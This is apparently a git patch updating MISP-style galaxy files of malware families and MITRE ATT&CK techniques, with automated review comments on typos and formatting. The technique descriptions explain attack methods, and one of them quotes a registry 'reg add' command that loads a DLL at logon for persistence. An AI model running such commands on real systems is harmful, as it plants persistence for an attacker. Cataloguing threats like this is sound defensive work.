"synonyms": [ + "Vega" + ], + "type": [] + }, + "uuid": "704bb00f-f558-4568-824c-847523700043", + "value": "VegaLocker" + }, { "description": "Ransomware that appears to require manually installation (believed to be via RDP). Encrypts files with .velso extension. ", "meta": { @@ -15526,7 +17684,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.vermin", "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/", - "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/" + "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/", + "https://www.fireeye.com/blog/threat-research/2019/04/spear-phishing-campaign-targets-ukraine-government.html" ], "synonyms": [], "type": [] 
@@ -15547,6 +17706,21 @@ "uuid": "044849d3-d0de-4f78-b67d-bfbe8dd3a255", "value": "Vflooder" }, + { + "description": "Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar", + "https://www.bleepingcomputer.com/news/security/gandcrab-operators-use-vidar-infostealer-as-a-forerunner/", + "https://tccontre.blogspot.com/2019/03/infor-stealer-vidar-trojanspy-analysis.html", + "https://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "1f44c08a-b427-4496-9d6d-909b6bf34b9b", + "value": "vidar" + }, { "description": "", "meta": { @@ -15565,8 +17739,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.virut", + "https://krebsonsecurity.com/2013/01/polish-takedown-targets-virut-botnet/", + "https://chrisdietri.ch/post/virut-resurrects/", + "https://www.secureworks.com/research/virut-encryption-analysis", "https://blog.malwarebytes.com/threat-analysis/2018/03/blast-from-the-past-stowaway-virut-delivered-with-chinese-ddos-bot/", - "https://www.theregister.co.uk/2018/01/10/taiwanese_police_malware/" + "https://www.theregister.co.uk/2018/01/10/taiwanese_police_malware/", + "https://www.spamhaus.org/news/article/690/cooperative-efforts-to-shut-down-virut-botnet", + "https://securelist.com/review-of-the-virus-win32-virut-ce-malware-sample/36305/" ], "synonyms": [], "type": [] 
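Review bot: The new Vidar entry in the first hunk sets `"value": "vidar"` in lower case, while the other entries added in this patch use the family's proper name as the value (`Vawtrak`, `VegaLocker`, `WallyShack`) and the entry's own description writes `Vidar`. Since `value` becomes the tag label that users see and search for, it should be `"value": "Vidar"`. Better to fix it before the entry ships, because renaming a value later changes the tag for everyone who has already applied it.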
@@ -15665,6 +17844,19 @@ "uuid": "2479b6b9-c818-4f96-aba4-47ed7855e4a8", "value": "w32times" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.wallyshack", + "https://blog.malwarebytes.com/threat-analysis/2019/02/new-golang-brute-forcer-discovered-amid-rise-e-commerce-attacks/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "0bd92907-c858-4164-87d6-fec0f3595e69", + "value": "WallyShack" + }, { "description": "", "meta": { @@ -15893,11 +18085,12 @@ "value": "WebC2-Yahoo" }, { - "description": "", + "description": "On its website, Webmonitor RAT is described as 'a very powerful, user-friendly, easy-to-setup and state-of-the-art monitoring tool. Webmonitor is a fully native RAT, meaning it will run on all Windows versions and languages starting from Windows XP and up, and perfectly compatible with all crypters and protectors.'\r\nUnit42 notes in their analysis that it is offered as C2-as-a-service and raises the controversial aspect that the builder allows to create client binaries that will not show any popup or dialogue during installation or while running on a target system.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.webmonitor", - "https://researchcenter.paloaltonetworks.com/2018/04/unit42-say-cheese-webmonitor-rat-comes-c2-service-c2aas/" + "https://researchcenter.paloaltonetworks.com/2018/04/unit42-say-cheese-webmonitor-rat-comes-c2-service-c2aas/", + "https://krebsonsecurity.com/2019/04/whos-behind-the-revcode-webmonitor-rat/" ], "synonyms": [], "type": [] @@ -15936,7 +18129,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.winmm", - "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf", + "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf", "https://securelist.com/analysis/publications/69953/the-naikon-apt/", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], 
@@ -15952,11 +18145,13 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.winnti", "https://github.com/TKCERT/winnti-suricata-lua", - "http://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/", - "https://github.com/TKCERT/winnti-nmap-script", "https://www.protectwise.com/blog/winnti-evolution-going-open-source.html", + "https://github.com/TKCERT/winnti-nmap-script", + "http://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/", "https://github.com/TKCERT/winnti-detector", - "http://blog.trendmicro.com/trendlabs-security-intelligence/pigs-malware-examining-possible-member-winnti-group/" + "http://blog.trendmicro.com/trendlabs-security-intelligence/pigs-malware-examining-possible-member-winnti-group/", + "https://securelist.com/games-are-over/70991/", + "https://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf" ], "synonyms": [], "type": [] @@ -15964,6 +18159,22 @@ "uuid": "7f8166e2-c7f4-4b48-a07b-681b61a8f2c1", "value": "Winnti (Windows)" }, + { + "description": "WinPot is created to make ATMs by a popular ATM vendor to automatically dispense all cash from their most valuable cassettes.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.winpot", + "https://www.association-secure-transactions.eu/east-publishes-fraud-update-2-2018/", + "https://securelist.com/atm-robber-winpot/89611/" + ], + "synonyms": [ + "ATMPot" + ], + "type": [] + }, + "uuid": "893a1da2-ae35-4877-8cde-3f532543af36", + "value": "WinPot" + }, { "description": "", "meta": { 
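Review bot: The WinPot description in the second hunk is ungrammatical ("is created to make ATMs by a popular ATM vendor to automatically dispense…") and never states what kind of software WinPot is. A reworded version that keeps the same facts would be `"description": "WinPot is ATM malware created to make ATMs from a popular ATM vendor automatically dispense all cash from their most valuable cassettes.",`. Descriptions are the only free-text a tag consumer sees, so they are worth a quick proofread when an entry is first added.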
@@ -16062,16 +18273,30 @@ "uuid": "258751c7-1ddb-4df6-9a17-36b08c2cb267", "value": "Woolger" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.wscspl", + "https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "62fd2b30-55b6-474a-8d72-31e492357d11", + "value": "WSCSPL" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xagent", "https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/", - "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", + "https://www.thecssc.com/wp-content/uploads/2018/10/4OctoberIOC-APT28-malware-advisory.pdf", + "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf", "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", - "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf", + "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", "http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf" ], "synonyms": [ @@ -16156,7 +18381,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xsplus", - "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf", + "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf", "https://securelist.com/analysis/publications/69953/the-naikon-apt/", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], 
@@ -16203,12 +18428,26 @@ "uuid": "000e25a4-4623-4afc-883d-ecc15be8f9d0", "value": "X-Tunnel (.NET)" }, + { + "description": "In March 2019, AT&T Alien Labs identified a new malware family that is actively scanning for exposed web services and default passwords. Based on our findings we are calling it \u201cXwo\u201d - taken from its primary module name. It is likely related to the previously reported malware families Xbash and MongoLock.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.xwo", + "https://www.alienvault.com/blogs/labs-research/xwo-a-python-based-bot-scanner" + ], + "synonyms": [], + "type": [] + }, + "uuid": "8a57cd75-4572-47c2-b5ef-55df978258de", + "value": "Xwo" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.xxmm", "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/", + "https://jsac.jpcert.or.jp/archive/2019/pdf/JSAC2019_8_nakatsuru_en.pdf", "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses" ], "synonyms": [ 
@@ -16284,8 +18523,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.zebrocy", + "https://unit42.paloaltonetworks.com/sofacy-creates-new-go-variant-of-zebrocy-tool/", + "https://www.accenture.com/us-en/blogs/blogs-snakemackerel-delivers-zekapab-malware", "https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/", - "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/" + "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/", + "https://www.welivesecurity.com/2018/11/20/sednit-whats-going-zebrocy/", + "https://securelist.com/greyenergys-overlap-with-zebrocy/89506/", + "https://www.vkremez.com/2018/12/lets-learn-dissecting-apt28sofacy.html", + "https://www.vkremez.com/2018/12/lets-learn-reviewing-sofacys-zebrocy-c.html", + "https://securelist.com/a-zebrocy-go-downloader/89419/" ], "synonyms": [ "Zekapab" @@ -16336,6 +18582,7 @@ ], "synonyms": [ "Max++", + "Sirefef", "Smiscer" ], "type": [] @@ -16553,5 +18800,5 @@ "value": "Zyklon" } ], - "version": 1838 + "version": 2559 } From 94466d8196dce3dafd2a41942d02e4c5362dbe51 Mon Sep 17 00:00:00 2001 From: Alexandre Dulaunoy Date: Tue, 30 Apr 2019 19:07:57 +0200 Subject: [PATCH 20/50] chg: [ATT&CK] updated to the latest version --- clusters/mitre-attack-pattern.json | 1044 +- clusters/mitre-course-of-action.json | 1313 +- ...re-enterprise-attack-course-of-action.json | 9 +- clusters/mitre-intrusion-set.json | 10573 ++++++---- clusters/mitre-malware.json | 17177 ++++++++++------ .../mitre-mobile-attack-attack-pattern.json | 2 +- .../mitre-mobile-attack-course-of-action.json | 2 +- clusters/mitre-mobile-attack-malware.json | 16 +- clusters/mitre-pre-attack-attack-pattern.json | 2 +- clusters/mitre-pre-attack-intrusion-set.json | 16 +- clusters/mitre-tool.json | 2274 +- 11 files changed, 21331 insertions(+), 11097 deletions(-) 
diff --git a/clusters/mitre-attack-pattern.json b/clusters/mitre-attack-pattern.json index 677e86c..d766609 100644 --- a/clusters/mitre-attack-pattern.json +++ b/clusters/mitre-attack-pattern.json @@ -229,7 +229,7 @@ "value": "Acquire and/or use 3rd party infrastructure services - T1329" }, { - "description": "Code signing is the process of digitally signing executables or scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Users may trust a signed piece of code more than an signed piece of code even if they don't know who issued the certificate or who the author is. (Citation: Adobe Code Signing Cert)", + "description": "Code signing is the process of digitally signing executables or scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Users may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is. (Citation: Adobe Code Signing Cert)", "meta": { "external_id": "T1310", "kill_chain": [ @@ -313,7 +313,7 @@ "value": "Compromise 3rd party infrastructure to support delivery - T1312" }, { - "description": "Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Users may trust a signed piece of code more than an signed piece of code even if they don't know who issued the certificate or who the author is. (Citation: DiginotarCompromise)", + "description": "Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Users may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is. (Citation: DiginotarCompromise)", "meta": { "external_id": "T1332", "kill_chain": [ 
@@ -393,7 +393,7 @@ "value": "Abuse of iOS Enterprise App Signing Key - T1445" }, { - "description": "Malicious applications are a common attack vector used by adversaries to gain a presence on mobile devices. Mobile devices often are configured to allow application installation only from an authorized app store (e.g., Google Play Store or Apple App Store). An adversary may seek to place a malicious application in an authorized app store, enabling the application to be installed onto targeted devices.\n\nApp stores typically require developer registration and use vetting techniques to identify malicious applications. Adversaries may use these techniques against app store defenses:\n\n* [Download New Code at Runtime](https://attack.mitre.org/techniques/T1407)\n* [Obfuscated or Encrypted Payload](https://attack.mitre.org/techniques/T1406)\n* PRE-ATT&CK: [Choose pre-compromised mobile app developer account credentials or signing keys](https://attack.mitre.org/techniques/T1391)\n* PRE-ATT&CK: [Test ability to evade automated mobile application security analysis performed by app stores](https://attack.mitre.org/techniques/T1393)\n\nAdversaries may also seek to evade vetting by placing code in a malicious application to detect whether it is running in an app analysis environment and, if so, avoid performing malicious actions while under analysis. (Citation: Petsas) (Citation: Oberheide-Bouncer) (Citation: Percoco-Bouncer) (Citation: Wang)\n\nAdversaries may also use fake identities, payment cards, etc., to create developer accounts to publish malicious applications to app stores. (Citation: Oberheide-Bouncer)\n\nAdversaries may also use control of a target's Google account to use the Google Play Store's remote installation capability to install apps onto the Android devices associated with the Google account. 
(Citation: Oberheide-RemoteInstall) (Citation: Konoth) (Only applications that are available for download through the Google Play Store can be remotely installed using this technique.)", + "description": "Malicious applications are a common attack vector used by adversaries to gain a presence on mobile devices. Mobile devices often are configured to allow application installation only from an authorized app store (e.g., Google Play Store or Apple App Store). An adversary may seek to place a malicious application in an authorized app store, enabling the application to be installed onto targeted devices.\n\nApp stores typically require developer registration and use vetting techniques to identify malicious applications. Adversaries may use these techniques against app store defenses:\n\n* [Download New Code at Runtime](https://attack.mitre.org/techniques/T1407)\n* [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1406)\n* PRE-ATT&CK: [Choose pre-compromised mobile app developer account credentials or signing keys](https://attack.mitre.org/techniques/T1391)\n* PRE-ATT&CK: [Test ability to evade automated mobile application security analysis performed by app stores](https://attack.mitre.org/techniques/T1393)\n\nAdversaries may also seek to evade vetting by placing code in a malicious application to detect whether it is running in an app analysis environment and, if so, avoid performing malicious actions while under analysis. (Citation: Petsas) (Citation: Oberheide-Bouncer) (Citation: Percoco-Bouncer) (Citation: Wang)\n\nAdversaries may also use fake identities, payment cards, etc., to create developer accounts to publish malicious applications to app stores. (Citation: Oberheide-Bouncer)\n\nAdversaries may also use control of a target's Google account to use the Google Play Store's remote installation capability to install apps onto the Android devices associated with the Google account. 
(Citation: Oberheide-RemoteInstall) (Citation: Konoth) (Only applications that are available for download through the Google Play Store can be remotely installed using this technique.)", "meta": { "external_id": "ECO-22", "kill_chain": [ 
@@ -561,7 +561,7 @@
 "value": "Identify vulnerabilities in third-party software libraries - T1389"
 },
 {
- "description": "Adding an entry to the \"run keys\" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.\n\nThe following run keys are created by default on Windows systems:\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\n\nThe HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx is also available but is not created by default on Windows Visa and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a \"Depend\" key with RunOnceEx: reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d \"C:\\temp\\evil[.]dll\" (Citation: Oddvar Moe RunOnceEx Mar 2018)\n\nThe following Registry keys can be used to set startup folder items for persistence:\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\n* HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\n* HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\n\nAdversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. 
Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.",
+ "description": "Adding an entry to the \"run keys\" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.\n\nThe following run keys are created by default on Windows systems:\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\n\nThe HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a \"Depend\" key with RunOnceEx: reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d \"C:\\temp\\evil[.]dll\" (Citation: Oddvar Moe RunOnceEx Mar 2018)\n\nThe following Registry keys can be used to set startup folder items for persistence:\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\n* HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\n* HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\n\nAdversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. 
Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.",
 "meta": {
 "external_id": "CAPEC-270",
 "kill_chain": [
@@ -587,7 +587,7 @@
 "value": "Registry Run Keys / Startup Folder - T1060"
 },
 {
- "description": "An adversary could exploit signaling system vulnerabilities to redirect calls or text messages to a phone number under the attacker's control. The adversary could then act as a man-in-the-middle to intercept or manipulate the communication. (Citation: Engel-SS7) (Citation: Engel-SS7-2008) (Citation: 3GPP-Security) (Citation: Positive-SS7) (Citation: CSRIC5-WG10-FinalReport)",
+ "description": "An adversary could exploit signaling system vulnerabilities to redirect calls or text messages (SMS) to a phone number under the attacker's control. The adversary could then act as a man-in-the-middle to intercept or manipulate the communication. (Citation: Engel-SS7) (Citation: Engel-SS7-2008) (Citation: 3GPP-Security) (Citation: Positive-SS7) (Citation: CSRIC5-WG10-FinalReport) Interception of SMS messages could enable adversaries to obtain authentication codes used for multi-factor authentication(Citation: TheRegister-SS7).",
 "meta": {
 "external_id": "CEL-37",
 "kill_chain": [
@@ -604,7 +604,8 @@
 "https://www.youtube.com/watch?v=q0n5ySqbfdI",
 "http://www.3gpp.org/ftp/tsg_sa/wg3_security/_specs/33900-120.pdf",
 "https://www.ptsecurity.com/upload/ptcom/PT-SS7-AD-Data-Sheet-eng.pdf",
- "https://www.fcc.gov/files/csric5-wg10-finalreport031517pdf"
+ "https://www.fcc.gov/files/csric5-wg10-finalreport031517pdf",
+ "https://www.theregister.co.uk/2017/05/03/hackers_fire_up_ss7_flaw/"
 ]
 },
 "uuid": "fb3fa94a-3aee-4ab0-b7e7-abdf0a51286d",
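Review bot: The new description glues its citation to the preceding word, `multi-factor authentication(Citation: TheRegister-SS7).`, while the rest of this entry and the surrounding file separate citations with a space, as in `(Citation: Engel-SS7) (Citation: Engel-SS7-2008)`; suggest `multi-factor authentication. (Citation: TheRegister-SS7)` to match. The same glued form appears in the new text of hunks -1055, -1079, -1114, -1585, -1706, -2080, -2229 and -2836, so the consistency fix applies to each of those as well. The ref added in hunk -604 does match the new citation key.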
@@ -692,8 +693,8 @@
 "https://attack.mitre.org/techniques/T1450",
 "https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-38.html",
 "https://berlin.ccc.de/~tobias/31c3-ss7-locate-track-manipulate.pdf",
- "http://www.3gpp.org/ftp/tsg_sa/wg3_security/_specs/33900-120.pdf",
 "https://www.youtube.com/watch?v=q0n5ySqbfdI",
+ "http://www.3gpp.org/ftp/tsg_sa/wg3_security/_specs/33900-120.pdf",
 "https://www.ptsecurity.com/upload/ptcom/PT-SS7-AD-Data-Sheet-eng.pdf",
 "https://www.fcc.gov/files/csric5-wg10-finalreport031517pdf"
 ]
@@ -1055,7 +1056,7 @@
 "value": "Modify OS Kernel or Boot Partition - T1398"
 },
 {
- "description": "If the mobile device is connected (typically via USB) to a charging station or a PC, for example to charge the device's battery, then a compromised or malicious charging station or PC could attempt to exploit the mobile device via the connection.\n\nKrebs described this technique in (Citation: Krebs-JuiceJacking). Lau et al. (Citation: Lau-Mactans) demonstrated the ability to inject malicious applications into an iOS device via USB. Hay (Citation: IBM-NexusUSB) demonstrated the ability to exploit a Nexus 6 or 6P device over USB and then gain the ability to perform actions including intercepting phone calls, intercepting network traffic, and obtaining the device physical location. Horn (Citation: GoogleProjectZero-OATmeal) demonstrated the ability to exploit Android devices such as the Google Pixel 2 over USB.\n\nProducts from Cellebrite and Grayshift purportedly can use physical access to the data port to unlock the passcode on some iOS devices (Citation: Computerworld-iPhoneCracking).",
+ "description": "If the mobile device is connected (typically via USB) to a charging station or a PC, for example to charge the device's battery, then a compromised or malicious charging station or PC could attempt to exploit the mobile device via the connection(Citation: Krebs-JuiceJacking).\n\nPrevious demonstrations have included:\n\n* Injecting malicious applications into iOS devices(Citation: Lau-Mactans).\n* Exploiting a Nexus 6 or 6P device over USB and gaining the ability to perform actions including intercepting phone calls, intercepting network traffic, and obtaining the device physical location(Citation: IBM-NexusUSB).\n* Exploiting Android devices such as the Google Pixel 2 over USB(Citation: GoogleProjectZero-OATmeal).\n\nProducts from Cellebrite and Grayshift purportedly can use physical access to the data port to unlock the passcode on some iOS devices(Citation: 
Computerworld-iPhoneCracking).",
 "meta": {
 "external_id": "PHY-1",
 "kill_chain": [
@@ -1079,7 +1080,7 @@
 "value": "Exploit via Charging Station or PC - T1458"
 },
 {
- "description": "Malicious applications are a common attack vector used by adversaries to gain a presence on mobile devices. This technique describes installing a malicious application on targeted mobile devices without involving an authorized app store (e.g., Google Play Store or Apple App Store). Adversaries may wish to avoid placing malicious applications in an authorized app store due to increased potential risk of detection or other reasons. However, mobile devices often are configured to allow application installation only from an authorized app store which would prevent this technique from working.\n\nDelivery methods for the malicious application include:\n\n* [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) - Including the mobile app package as an attachment to an email message.\n* [Spearphishing Link](https://attack.mitre.org/techniques/T1192) - Including a link to the mobile app package within an email, text message (e.g. SMS, iMessage, Hangouts, WhatsApp, etc.), web site, QR code, or other means.\n\nAs a prerequisite, adversaries may use this PRE-ATT&CK technique:\n\n* [Obtain Apple iOS enterprise distribution key pair and certificate](https://attack.mitre.org/techniques/T1392)",
+ "description": "Malicious applications are a common attack vector used by adversaries to gain a presence on mobile devices. This technique describes installing a malicious application on targeted mobile devices without involving an authorized app store (e.g., Google Play Store or Apple App Store). Adversaries may wish to avoid placing malicious applications in an authorized app store due to increased potential risk of detection or other reasons. 
However, mobile devices often are configured to allow application installation only from an authorized app store which would prevent this technique from working.\n\nDelivery methods for the malicious application include:\n\n* [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) - Including the mobile app package as an attachment to an email message.\n* [Spearphishing Link](https://attack.mitre.org/techniques/T1192) - Including a link to the mobile app package within an email, text message (e.g. SMS, iMessage, Hangouts, WhatsApp, etc.), web site, QR code, or other means.\n* Third-Party App Store - Installed from a third-party app store (as opposed to an authorized app store that the device implicitly trusts as part of its default behavior), which may not apply the same level of scrutiny to apps as applied by an authorized app store.(Citation: IBTimes-ThirdParty)(Citation: TrendMicro-RootingMalware)(Citation: TrendMicro-FlappyBird)\n\nAs a prerequisite, adversaries may use this PRE-ATT&CK technique:\n\n* [Obtain Apple iOS enterprise distribution key pair and certificate](https://attack.mitre.org/techniques/T1392)",
 "meta": {
 "external_id": "ECO-21",
 "kill_chain": [
@@ -1093,7 +1094,10 @@
 "https://attack.mitre.org/techniques/T1476",
 "https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-9.html",
 "https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-13.html",
- "https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-21.html"
+ "https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-21.html",
+ "https://www.ibtimes.co.uk/danger-lurks-third-party-android-app-stores-1544861",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/user-beware-rooting-malware-found-in-3rd-party-app-stores/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/flappy-bird-and-third-party-app-stores/"
 ]
 },
 "uuid": "53263a67-075e-48fa-974b-91c5b5445db7",
@@ -1114,7 +1118,7 @@
 "value": "Upload, install, and configure software/tools - T1362"
 },
 {
- "description": "An Android application can listen for the BOOT_COMPLETED broadcast, ensuring that the app's functionality will be activated every time the device starts up without having to wait for the device user to manually start the app.\n\n Zhou and Jiang (Citation: Zhou) analyzed 1260 Android malware samples belonging to 49 families of malware, and determined that 29 malware families and 83.3% of the samples listened for BOOT_COMPLETED.",
+ "description": "An Android application can listen for the BOOT_COMPLETED broadcast, ensuring that the app's functionality will be activated every time the device starts up without having to wait for the device user to manually start the app.\n\nAn analysis published in 2012(Citation: Zhou) of1260 Android malware samples belonging to 49 families of malware determined that 29 malware families and 83.3% of the samples listened for BOOT_COMPLETED.",
 "meta": {
 "external_id": "T1402",
 "kill_chain": [
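Review bot: The rewritten description introduces a typo, `of1260 Android malware samples`, where the space after `of` was lost; change it to `of 1260 Android malware samples`. The old text had this number correctly spaced, so the defect is new to this commit.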
@@ -1458,7 +1462,7 @@
 "value": "Data from Network Shared Drive - T1039"
 },
 {
- "description": "An app could download and execute dynamic code (not included in the original application package) after installation to evade static analysis techniques (and potentially dynamic analysis techniques) used for application vetting or application store review (Citation: Poeplau-ExecuteThis). \n\nOn Android, dynamic code could include native code, Dalvik code, or JavaScript code that uses the Android WebView's JavascriptInterface capability (Citation: Bromium-AndroidRCE).\n\nOn iOS, techniques for executing dynamic code downloaded after application installation include JSPatch (Citation: FireEye-JSPatch). Wang et al. describe a related method of constructing malicious logic at app runtime on iOS (Citation: Wang).",
+ "description": "An app could download and execute dynamic code (not included in the original application package) after installation to evade static analysis techniques (and potentially dynamic analysis techniques) used for application vetting or application store review.(Citation: Poeplau-ExecuteThis)\n\nOn Android, dynamic code could include native code, Dalvik code, or JavaScript code that uses the Android WebView's JavascriptInterface capability.(Citation: Bromium-AndroidRCE)\n\nOn iOS, techniques also exist for executing dynamic code downloaded after application installation.(Citation: FireEye-JSPatch)(Citation: Wang)",
 "meta": {
 "external_id": "APP-20",
 "kill_chain": [
@@ -1585,7 +1589,7 @@
 "value": "Image File Execution Options Injection - T1183"
 },
 {
- "description": "A malicious app can register as a device keyboard and intercept keypresses containing sensitive values such as usernames and passwords. Zeltser (Citation: Zeltser-Keyboard) describes these risks.\n\nBoth iOS and Android require the user to explicitly authorize use of third party keyboard apps. Users should be advised to use extreme caution before granting this authorization when it is requested.",
+ "description": "A malicious app can register as a device keyboard and intercept keypresses containing sensitive values such as usernames and passwords(Citation: Zeltser-Keyboard).\n\nBoth iOS and Android require the user to explicitly authorize use of third party keyboard apps. Users should be advised to use extreme caution before granting this authorization when it is requested.",
 "meta": {
 "external_id": "T1417",
 "kill_chain": [
@@ -1706,7 +1710,7 @@
 "value": "Determine secondary level tactical element - T1244"
 },
 {
- "description": "With escalated privileges, an adversary could program the mobile device to impersonate USB devices such as input devices (keyboard and mouse), storage devices, and/or networking devices in order to attack a physically connected PC. Wang and Stavrou (Citation: Wang-ExploitingUSB) and Kamkar (Citation: ArsTechnica-PoisonTap) describe this technique. This technique has been demonstrated on Android, and we are unaware of any demonstrations on iOS.",
+ "description": "With escalated privileges, an adversary could program the mobile device to impersonate USB devices such as input devices (keyboard and mouse), storage devices, and/or networking devices in order to attack a physically connected PC(Citation: Wang-ExploitingUSB)(Citation: ArsTechnica-PoisonTap) This technique has been demonstrated on Android. We are unaware of any demonstrations on iOS.",
 "meta": {
 "external_id": "PHY-2",
 "kill_chain": [
